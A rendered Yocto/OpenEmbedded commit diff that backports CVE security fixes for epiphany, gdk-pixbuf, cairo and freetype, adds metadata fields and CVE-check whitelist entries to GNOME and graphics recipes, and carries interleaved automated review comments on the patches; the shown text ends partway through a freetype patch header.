18SRC_URI[archive.sha256sum] = "60e190fc07ec7e33472e60c7e633e04004f7e277a0ffc5e9cd413706881e598d" 22SRC_URI[archive.sha256sum] = "60e190fc07ec7e33472e60c7e633e04004f7e277a0ffc5e9cd413706881e598d"
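--- /dev/null
+++ b/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch
@@ -0,0 +1,46 @@
+CVE: CVE-2022-29536
+Upstream-Status: Backport [ https://gitlab.gnome.org/GNOME/epiphany/-/commit/486da133569ebfc436c959a7419565ab102e8525 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 486da133569ebfc436c959a7419565ab102e8525 Mon Sep 17 00:00:00 2001
+From: Michael Catanzaro <mcatanzaro@redhat.com>
+Date: Fri, 15 Apr 2022 18:09:46 -0500
+Subject: [PATCH] Fix memory corruption in ephy_string_shorten()
+
+This fixes a regression that I introduced in 232c613472b38ff0d0d97338f366024ddb9cd228.
+
+I got my browser stuck in a crash loop today while visiting a website
+with a page title greater than ephy-embed.c's MAX_TITLE_LENGTH, the only
+condition in which ephy_string_shorten() is ever used. Turns out this
+commit is wrong: an ellipses is a multibyte character (three bytes in
+UTF-8) and so we're writing past the end of the buffer when calling
+strcat() here. Ooops.
+
+Shame it took nearly four years to notice and correct this.
+
+Part-of: <https://gitlab.gnome.org/GNOME/epiphany/-/merge_requests/1106>
+---
+ lib/ephy-string.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/lib/ephy-string.c b/lib/ephy-string.c
+index 35a148ab32..8e524d52ca 100644
+--- a/lib/ephy-string.c
++++ b/lib/ephy-string.c
+@@ -114,11 +114,10 @@ ephy_string_shorten (char *str,
+ /* create string */
+ bytes = GPOINTER_TO_UINT (g_utf8_offset_to_pointer (str, target_length - 1) - str);
+
+- /* +1 for ellipsis, +1 for trailing NUL */
+- new_str = g_new (gchar, bytes + 1 + 1);
++ new_str = g_new (gchar, bytes + strlen ("…") + 1);
+
+ strncpy (new_str, str, bytes);
+- strcat (new_str, "…");
++ strncpy (new_str + bytes, "…", strlen ("…") + 1);
+
+ g_free (str);
+
+--
+GitLab
+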
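Review bot: Both copies in the lib/ephy-string.c hunk call `strncpy` with a length derived from the source rather than from the destination, so the call behaves as a plain memory copy and adds no bounds protection; GCC reports this pattern under `-Wstringop-truncation`. The first call appears to leave `new_str` unterminated on purpose and relies on the second call to write the NUL, which the next reader cannot see from the code. `memcpy (new_str, str, bytes);` followed by `memcpy (new_str + bytes, "…", strlen ("…") + 1);` states the same intent directly. ephy_string_shorten starts and ends outside the hunk.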
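--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
@@ -0,0 +1,40 @@
+From 086e8adf4cc352cd11572f96066b001b545f354e Mon Sep 17 00:00:00 2001
+From: Emmanuele Bassi <ebassi@gnome.org>
+Date: Wed, 1 Apr 2020 18:11:55 +0100
+Subject: [PATCH] Check the memset length argument
+
+Avoid overflows by using the checked multiplication macro for gsize.
+
+Fixes: #132
+
+Upstream-Status: Backported [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e]
+CVE: CVE-2021-20240
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ gdk-pixbuf/io-gif-animation.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
+index c9db3c66e..49674fd2e 100644
+--- a/gdk-pixbuf/io-gif-animation.c
++++ b/gdk-pixbuf/io-gif-animation.c
+@@ -412,11 +412,15 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
+
+ /* If no rendered frame, render the first frame */
+ if (anim->last_frame == NULL) {
++ gsize len = 0;
+ if (anim->last_frame_data == NULL)
+ anim->last_frame_data = gdk_pixbuf_new (GDK_COLORSPACE_RGB, TRUE, 8, anim->width, anim->height);
+ if (anim->last_frame_data == NULL)
+ return NULL;
+- memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, gdk_pixbuf_get_rowstride (anim->last_frame_data) * anim->height);
++ if (g_size_checked_mul (&len, gdk_pixbuf_get_rowstride (anim->last_frame_data), anim->height))
++ memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, len);
++ else
++ return NULL;
+ composite_frame (anim, g_list_nth_data (anim->frames, 0));
+ }
+
+--
+GitLab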
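Review bot: The header tag reads `Upstream-Status: Backported [...]`, but the status value used for a fix taken from upstream is `Backport`, which is also what the other patches in this commit use. Tooling or reviewers that filter patches by status may not recognise the variant spelling, so this CVE fix could be miscounted as unclassified. The line should read `Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e]`.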
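--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch
@@ -0,0 +1,61 @@
+From bdf3a2630c02a63803309cf0ad4b274234c814ce Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 9 Aug 2022 09:45:42 +0530
+Subject: [PATCH] CVE-2021-46829
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/5398f04d772f7f8baf5265715696ed88db0f0512]
+CVE: CVE-2021-46829
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ gdk-pixbuf/io-gif-animation.c | 21 +++++++++++++--------
+ 1 file changed, 13 insertions(+), 8 deletions(-)
+
+diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
+index d742963..9544391 100644
+--- a/gdk-pixbuf/io-gif-animation.c
++++ b/gdk-pixbuf/io-gif-animation.c
+@@ -364,7 +364,7 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
+ for (i = 0; i < n_indexes; i++) {
+ guint8 index = index_buffer[i];
+ guint x, y;
+- int offset;
++ gsize offset;
+
+ if (index == frame->transparent_index)
+ continue;
+@@ -374,11 +374,13 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
+ if (x >= anim->width || y >= anim->height)
+ continue;
+
+- offset = y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + x * 4;
+- pixels[offset + 0] = frame->color_map[index * 3 + 0];
+- pixels[offset + 1] = frame->color_map[index * 3 + 1];
+- pixels[offset + 2] = frame->color_map[index * 3 + 2];
+- pixels[offset + 3] = 255;
++ if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
++ g_size_checked_add (&offset, offset, x * 4)) {
++ pixels[offset + 0] = frame->color_map[index * 3 + 0];
++ pixels[offset + 1] = frame->color_map[index * 3 + 1];
++ pixels[offset + 2] = frame->color_map[index * 3 + 2];
++ pixels[offset + 3] = 255;
++ }
+ }
+
+ out:
+@@ -443,8 +445,11 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
+ x_end = MIN (anim->last_frame->x_offset + anim->last_frame->width, anim->width);
+ y_end = MIN (anim->last_frame->y_offset + anim->last_frame->height, anim->height);
+ for (y = anim->last_frame->y_offset; y < y_end; y++) {
+- guchar *line = pixels + y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + anim->last_frame->x_offset * 4;
+- memset (line, 0, (x_end - anim->last_frame->x_offset) * 4);
++ gsize offset;
++ if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
++ g_size_checked_add (&offset, offset, anim->last_frame->x_offset * 4)) {
++ memset (pixels + offset, 0, (x_end - anim->last_frame->x_offset) * 4);
++ }
+ }
+ break;
+ case GDK_PIXBUF_FRAME_REVERT:
+--
+2.25.1
+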
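Review bot: In the third hunk the row offset is now computed with `g_size_checked_mul`/`g_size_checked_add`, but the `memset` length `(x_end - anim->last_frame->x_offset) * 4` on the guarded line is still plain arithmetic, and nothing visible in the hunk shows that `x_offset` cannot exceed `x_end`. If it can, the difference goes negative and converts to a very large size. The operands `x * 4` (with `x` declared `guint`) and `anim->last_frame->x_offset * 4` are likewise multiplied before they reach the checked add, so a wrap there would pass unnoticed. Unless the frame geometry is validated elsewhere (both functions start and end outside the hunks), a guard such as `if (x_end > anim->last_frame->x_offset)` around the memset would close the gap. The patch header also has no description beyond the CVE id; one line summarising the upstream fix would help later audits.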
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
index 54861e83c6..1171e6cc11 100644
--- a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
@@ -25,6 +25,8 @@ SRC_URI = "${GNOME_MIRROR}/${BPN}/${MAJ_VER}/${BPN}-${PV}.tar.xz \
25 file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \ 25 file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \
26 file://missing-test-data.patch \ 26 file://missing-test-data.patch \
27 file://CVE-2020-29385.patch \ 27 file://CVE-2020-29385.patch \
28 file://CVE-2021-20240.patch \
29 file://CVE-2021-46829.patch \
28 " 30 "
29 31
30SRC_URI_append_class-target = " \ 32SRC_URI_append_class-target = " \
diff --git a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
index 3a2727b701..5503f225bb 100644
--- a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
+++ b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
@@ -1,4 +1,6 @@
1SUMMARY = "GTK+ icon theme" 1SUMMARY = "GTK+ icon theme"
2DESCRIPTION = "The Adwaita icon theme is the default icon theme of the GNOME desktop \
3This package package contains an icon theme for Gtk+ 3 applications."
2HOMEPAGE = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme" 4HOMEPAGE = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme"
3BUGTRACKER = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme/issues" 5BUGTRACKER = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme/issues"
4SECTION = "x11/gnome" 6SECTION = "x11/gnome"
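Review bot: The added `DESCRIPTION` reads "...default icon theme of the GNOME desktop This package package contains..." once the line continuation is joined: the first sentence has no full stop and "package" is doubled. The two lines would read correctly as `DESCRIPTION = "The Adwaita icon theme is the default icon theme of the GNOME desktop. \` followed by `This package contains an icon theme for Gtk+ 3 applications."`.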
diff --git a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
index 92b0d1d52f..0842f10ea9 100644
--- a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
+++ b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
@@ -102,7 +102,7 @@ EOF
102 # from the target sysroot. 102 # from the target sysroot.
103 cat > ${B}/g-ir-scanner-wrapper << EOF 103 cat > ${B}/g-ir-scanner-wrapper << EOF
104#!/bin/sh 104#!/bin/sh
105# This prevents g-ir-scanner from writing cache data to $HOME 105# This prevents g-ir-scanner from writing cache data to user's HOME dir
106export GI_SCANNER_DISABLE_CACHE=1 106export GI_SCANNER_DISABLE_CACHE=1
107 107
108g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@" 108g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@"
diff --git a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
index 0306b04f4e..6b59029255 100644
--- a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
+++ b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Library for sending desktop notifications to a notification daemon" 1SUMMARY = "Library for sending desktop notifications to a notification daemon"
2DESCRIPTION = "It sends desktop notifications to a notification daemon, as defined \
3in the Desktop Notifications spec. These notifications can be used to inform \
4the user about an event or display some form of information without getting \
5in the user's way."
2HOMEPAGE = "https://gitlab.gnome.org/GNOME/libnotify" 6HOMEPAGE = "https://gitlab.gnome.org/GNOME/libnotify"
3BUGTRACKER = "https://gitlab.gnome.org/GNOME/libnotify/issues" 7BUGTRACKER = "https://gitlab.gnome.org/GNOME/libnotify/issues"
4SECTION = "libs" 8SECTION = "libs"
@@ -20,3 +24,6 @@ PROVIDES += "libnotify3"
20RPROVIDES_${PN} += "libnotify3" 24RPROVIDES_${PN} += "libnotify3"
21RCONFLICTS_${PN} += "libnotify3" 25RCONFLICTS_${PN} += "libnotify3"
22RREPLACES_${PN} += "libnotify3" 26RREPLACES_${PN} += "libnotify3"
27
28# -7381 is specific to the NodeJS bindings
29CVE_CHECK_WHITELIST += "CVE-2013-7381"
diff --git a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
index 237aec6062..ef1dae0a69 100644
--- a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
+++ b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
@@ -25,6 +25,9 @@ SRC_URI += "file://gtk-option.patch \
25 25
26SRC_URI[archive.sha256sum] = "f7628905f1cada84e87e2b14883ed57d8094dca3281d5bcb24ece4279e9a92ba" 26SRC_URI[archive.sha256sum] = "f7628905f1cada84e87e2b14883ed57d8094dca3281d5bcb24ece4279e9a92ba"
27 27
28# Issue only on windows
29CVE_CHECK_WHITELIST += "CVE-2018-1000041"
30
28CACHED_CONFIGUREVARS = "ac_cv_path_GDK_PIXBUF_QUERYLOADERS=${STAGING_LIBDIR_NATIVE}/gdk-pixbuf-2.0/gdk-pixbuf-query-loaders" 31CACHED_CONFIGUREVARS = "ac_cv_path_GDK_PIXBUF_QUERYLOADERS=${STAGING_LIBDIR_NATIVE}/gdk-pixbuf-2.0/gdk-pixbuf-query-loaders"
29 32
30PACKAGECONFIG ??= "gdkpixbuf" 33PACKAGECONFIG ??= "gdkpixbuf"
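--- a/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
+++ b/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
@@ -4,6 +4,7 @@ the freedesktop.org project, a cross-desktop effort to access passwords, \
 tokens and other types of secrets. libsecret provides a convenient wrapper \
 for these methods so consumers do not have to call the low-level DBus methods."
 LICENSE = "LGPLv2.1"
+HOMEPAGE = "https://github.com/GNOME/libsecret"
 BUGTRACKER = "https://gitlab.gnome.org/GNOME/libsecret/issues"
 LIC_FILES_CHKSUM = "file://COPYING;md5=23c2a5e0106b99d75238986559bb5fc6"
 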
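Review bot: The new `HOMEPAGE` points at github.com while the `BUGTRACKER` line directly below it uses gitlab.gnome.org for the same project, so the recipe now names two different hosts as upstream. Presumably the GitHub repository is a mirror; if so, keeping both on one host makes the recipe's upstream reference unambiguous for anyone checking provenance: `HOMEPAGE = "https://gitlab.gnome.org/GNOME/libsecret"`.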
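--- a/meta/recipes-graphics/builder/builder_0.1.bb
+++ b/meta/recipes-graphics/builder/builder_0.1.bb
@@ -29,3 +29,5 @@ do_install () {
  chown builder.builder ${D}${sysconfdir}/mini_x/session.d/builder_session.sh
 }
 
+# -4178 is an unrelated 'builder'
+CVE_CHECK_WHITELIST = "CVE-2008-4178"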
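Review bot: `CVE_CHECK_WHITELIST = "CVE-2008-4178"` assigns the variable outright, whereas the libnotify and librsvg recipes in this same commit append with `+=`. A plain `=` in the recipe replaces whatever the variable held when the recipe is parsed, so entries contributed by configuration would be dropped for this recipe. `CVE_CHECK_WHITELIST += "CVE-2008-4178"` matches the other recipes and avoids that. The comment could also spell out the full CVE id and name the product it belongs to, so the suppression can be re-checked later.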
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
index 5232cf70c6..a2dba6cb20 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
@@ -1,19 +1,20 @@
1There is a potential infinite-loop in function _arc_error_normalized(). 1There is an assertion in function _cairo_arc_in_direction().
2 2
3CVE: CVE-2019-6461 3CVE: CVE-2019-6461
4Upstream-Status: Pending 4Upstream-Status: Pending
5Signed-off-by: Ross Burton <ross.burton@intel.com> 5Signed-off-by: Ross Burton <ross.burton@intel.com>
6 6
7diff --git a/src/cairo-arc.c b/src/cairo-arc.c 7diff --git a/src/cairo-arc.c b/src/cairo-arc.c
8index 390397bae..f9249dbeb 100644 8index 390397bae..1bde774a4 100644
9--- a/src/cairo-arc.c 9--- a/src/cairo-arc.c
10+++ b/src/cairo-arc.c 10+++ b/src/cairo-arc.c
11@@ -99,7 +99,7 @@ _arc_max_angle_for_tolerance_normalized (double tolerance) 11@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t *cr,
12 do { 12 if (cairo_status (cr))
13 angle = M_PI / i++; 13 return;
14 error = _arc_error_normalized (angle);
15- } while (error > tolerance);
16+ } while (error > tolerance && error > __DBL_EPSILON__);
17 14
18 return angle; 15- assert (angle_max >= angle_min);
19 } 16+ if (angle_max < angle_min)
17+ return;
18
19 if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) {
20 angle_max = fmod (angle_max - angle_min, 2 * M_PI);
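Review bot: The replacement guard `if (angle_max < angle_min) return;` is not the exact complement of the removed `assert (angle_max >= angle_min)`. When either angle is NaN both comparisons are false, so input the assert would have rejected now continues into the `fmod` arithmetic below. Writing the guard as `if (!(angle_max >= angle_min)) return;` keeps the original condition. The early return also leaves the context status untouched, so a caller cannot tell the arc was dropped; whether that matters depends on code outside this hunk, since `_cairo_arc_in_direction` starts and ends beyond it.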
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
index 4e4598c5b5..7c3209291b 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
@@ -1,20 +1,40 @@
1There is an assertion in function _cairo_arc_in_direction().
2
3CVE: CVE-2019-6462 1CVE: CVE-2019-6462
4Upstream-Status: Pending 2Upstream-Status: Backport
5Signed-off-by: Ross Burton <ross.burton@intel.com> 3Signed-off-by: Quentin Schulz <quentin.schulz@theobroma-systems.com>
4
5From ab2c5ee21e5f3d3ee4b3f67cfcd5811a4f99c3a0 Mon Sep 17 00:00:00 2001
6From: Heiko Lewin <hlewin@gmx.de>
7Date: Sun, 1 Aug 2021 11:16:03 +0000
8Subject: [PATCH] _arc_max_angle_for_tolerance_normalized: fix infinite loop
9
10---
11 src/cairo-arc.c | 4 +++-
12 1 file changed, 3 insertions(+), 1 deletion(-)
6 13
7diff --git a/src/cairo-arc.c b/src/cairo-arc.c 14diff --git a/src/cairo-arc.c b/src/cairo-arc.c
8index 390397bae..1bde774a4 100644 15index 390397bae..1c891d1a0 100644
9--- a/src/cairo-arc.c 16--- a/src/cairo-arc.c
10+++ b/src/cairo-arc.c 17+++ b/src/cairo-arc.c
11@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t *cr, 18@@ -90,16 +90,18 @@ _arc_max_angle_for_tolerance_normalized (double tolerance)
12 if (cairo_status (cr)) 19 { M_PI / 11.0, 9.81410988043554039085e-09 },
13 return; 20 };
21 int table_size = ARRAY_LENGTH (table);
22+ const int max_segments = 1000; /* this value is chosen arbitrarily. this gives an error of about 1.74909e-20 */
14 23
15- assert (angle_max >= angle_min); 24 for (i = 0; i < table_size; i++)
16+ if (angle_max < angle_min) 25 if (table[i].error < tolerance)
17+ return; 26 return table[i].angle;
18 27
19 if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) { 28 ++i;
20 angle_max = fmod (angle_max - angle_min, 2 * M_PI); 29+
30 do {
31 angle = M_PI / i++;
32 error = _arc_error_normalized (angle);
33- } while (error > tolerance);
34+ } while (error > tolerance && i < max_segments);
35
36 return angle;
37 }
38--
392.38.1
40
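Review bot: `Upstream-Status: Backport` is given without the bracketed reference to where the fix came from, and that reference is what lets a later audit confirm the backport matches upstream; CVE-2020-35492.patch in this commit has the same gap. The upstream commit id is already in the `From ab2c5ee21e5f3d3ee4b3f67cfcd5811a4f99c3a0` line, so the tag can carry it: `Upstream-Status: Backport [<upstream commit URL for ab2c5ee21e5f3d3ee4b3f67cfcd5811a4f99c3a0>]`. The patch body also has no description of the change; one sentence saying the loop is now bounded by `max_segments` would help.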
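--- /dev/null
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch
@@ -0,0 +1,60 @@
+Fix stack buffer overflow.
+
+CVE: CVE-2020-35492
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 03a820b173ed1fdef6ff14b4468f5dbc02ff59be Mon Sep 17 00:00:00 2001
+From: Heiko Lewin <heiko.lewin@worldiety.de>
+Date: Tue, 15 Dec 2020 16:48:19 +0100
+Subject: [PATCH] Fix mask usage in image-compositor
+
+---
+ src/cairo-image-compositor.c | 8 ++--
+ test/Makefile.sources | 1 +
+ test/bug-image-compositor.c | 39 ++++++++++++++++++++
+ test/reference/bug-image-compositor.ref.png | Bin 0 -> 185 bytes
+ 4 files changed, 44 insertions(+), 4 deletions(-)
+ create mode 100644 test/bug-image-compositor.c
+ create mode 100644 test/reference/bug-image-compositor.ref.png
+
+diff --git a/src/cairo-image-compositor.c b/src/cairo-image-compositor.c
+index 79ad69f68..4f8aaed99 100644
+--- a/src/cairo-image-compositor.c
++++ b/src/cairo-image-compositor.c
+@@ -2601,14 +2601,14 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ unsigned num_spans)
+ {
+ cairo_image_span_renderer_t *r = abstract_renderer;
+- uint8_t *m;
++ uint8_t *m, *base = (uint8_t*)pixman_image_get_data(r->mask);
+ int x0;
+
+ if (num_spans == 0)
+ return CAIRO_STATUS_SUCCESS;
+
+ x0 = spans[0].x;
+- m = r->_buf;
++ m = base;
+ do {
+ int len = spans[1].x - spans[0].x;
+ if (len >= r->u.composite.run_length && spans[0].coverage == 0xff) {
+@@ -2655,7 +2655,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ spans[0].x, y,
+ spans[1].x - spans[0].x, h);
+
+- m = r->_buf;
++ m = base;
+ x0 = spans[1].x;
+ } else if (spans[0].coverage == 0x0) {
+ if (spans[0].x != x0) {
+@@ -2684,7 +2684,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
+ #endif
+ }
+
+- m = r->_buf;
++ m = base;
+ x0 = spans[1].x;
+ } else {
+ *m++ = spans[0].coverage;
+--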
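Review bot: The patch header's diffstat still lists four files (`test/Makefile.sources`, `test/bug-image-compositor.c` and the reference PNG besides the source file), yet only the `src/cairo-image-compositor.c` hunks are present, so the upstream regression test was dropped without any record. The freetype backports in this commit document such edits with a `Comment:` line, and the same here would tell an auditor the difference from upstream is intentional, for example `Comment: test/ hunks dropped` plus the reason. The reason is presumably the binary reference image, but that should be confirmed and stated.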
diff --git a/meta/recipes-graphics/cairo/cairo_1.16.0.bb b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
index 8663dec404..4827374ffc 100644
--- a/meta/recipes-graphics/cairo/cairo_1.16.0.bb
+++ b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
@@ -27,6 +27,7 @@ SRC_URI = "http://cairographics.org/releases/cairo-${PV}.tar.xz \
27 file://CVE-2018-19876.patch \ 27 file://CVE-2018-19876.patch \
28 file://CVE-2019-6461.patch \ 28 file://CVE-2019-6461.patch \
29 file://CVE-2019-6462.patch \ 29 file://CVE-2019-6462.patch \
30 file://CVE-2020-35492.patch \
30 " 31 "
31 32
32SRC_URI[md5sum] = "f19e0353828269c22bd72e271243a552" 33SRC_URI[md5sum] = "f19e0353828269c22bd72e271243a552"
diff --git a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
index 7d9db1f38c..73315c97ec 100644
--- a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
@@ -1,5 +1,9 @@
1SUMMARY = "GStreamer integration library for Clutter" 1SUMMARY = "GStreamer integration library for Clutter"
2DESCRIPTION = "Clutter-Gst is an integration library for using GStreamer with Clutter. \
3It provides a GStreamer sink to upload frames to GL and an actor that \
4implements the ClutterGstPlayer interface using playbin."
2HOMEPAGE = "http://www.clutter-project.org/" 5HOMEPAGE = "http://www.clutter-project.org/"
6BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter-gst/-/issues"
3LICENSE = "LGPLv2+" 7LICENSE = "LGPLv2+"
4 8
5inherit clutter features_check upstream-version-is-even gobject-introspection 9inherit clutter features_check upstream-version-is-even gobject-introspection
diff --git a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
index 7bf2278555..9a28b5219b 100644
--- a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
@@ -1,5 +1,10 @@
1SUMMARY = "Library for embedding a Clutter canvas in a GTK+ application" 1SUMMARY = "Library for embedding a Clutter canvas in a GTK+ application"
2DESCRIPTION = "Clutter-GTK is a library providing facilities to integrate Clutter into GTK+ \
3applications and vice versa. It provides a GTK+ widget, GtkClutterEmbed, for embedding the \
4a Clutter stage into any GtkContainer; and GtkClutterActor, a Clutter \
5actor for embedding any GtkWidget inside a Clutter stage."
2HOMEPAGE = "http://www.clutter-project.org/" 6HOMEPAGE = "http://www.clutter-project.org/"
7BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter/-/issues"
3LICENSE = "LGPLv2+" 8LICENSE = "LGPLv2+"
4 9
5CLUTTERBASEBUILDCLASS = "meson" 10CLUTTERBASEBUILDCLASS = "meson"
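Review bot: The added `DESCRIPTION` contains "for embedding the a Clutter stage" where the line continuation joins two lines; dropping the stray "the" at the end of the `GtkClutterEmbed` line fixes it. The new `BUGTRACKER` also points at the `GNOME/clutter` project, while the clutter-gst include in this commit points at its own `GNOME/clutter-gst` tracker. If clutter-gtk has a tracker of its own the URL should name it; please confirm which is intended.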
diff --git a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
index fa8a29b798..31f9e32dc2 100644
--- a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
+++ b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
@@ -6,10 +6,13 @@ Subject: [PATCH] [sfnt] Fix heap buffer overflow (#59308).
6This is CVE-2020-15999. 6This is CVE-2020-15999.
7 7
8* src/sfnt/pngshim.c (Load_SBit_Png): Test bitmap size earlier. 8* src/sfnt/pngshim.c (Load_SBit_Png): Test bitmap size earlier.
9CVE: CVE-2020-15999
9 10
10Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=a3bab162b2ae616074c8877a04556932998aeacd] 11Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=a3bab162b2ae616074c8877a04556932998aeacd]
11 12
12Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com> 13Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
14Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
15Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
13--- 16---
14 src/sfnt/pngshim.c | 14 +++++++------- 17 src/sfnt/pngshim.c | 14 +++++++-------
15 1 file changed, 7 insertions(+), 7 deletions(-) 18 1 file changed, 7 insertions(+), 7 deletions(-)
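--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch
@@ -0,0 +1,33 @@
+From 53dfdcd8198d2b3201a23c4bad9190519ba918db Mon Sep 17 00:00:00 2001
+From: Werner Lemberg <wl@gnu.org>
+Date: Thu, 17 Mar 2022 19:24:16 +0100
+Subject: [PATCH] [sfnt] Avoid invalid face index.
+
+Fixes #1138.
+
+* src/sfnt/sfobjs.c (sfnt_init_face), src/sfnt/sfwoff2.c (woff2_open_font):
+Check `face_index` before decrementing.
+
+CVE: CVE-2022-27404
+Upstream-Status: Backport [https://gitlab.freedesktop.org/freetype/freetype/-/commit/53dfdcd8198d2b3201a23c4bad9190519ba918db.patch]
+Comment: Removed second hunk as sfwoff2.c file is not part of current v2.10.1 code
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+---
+ src/sfnt/sfobjs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
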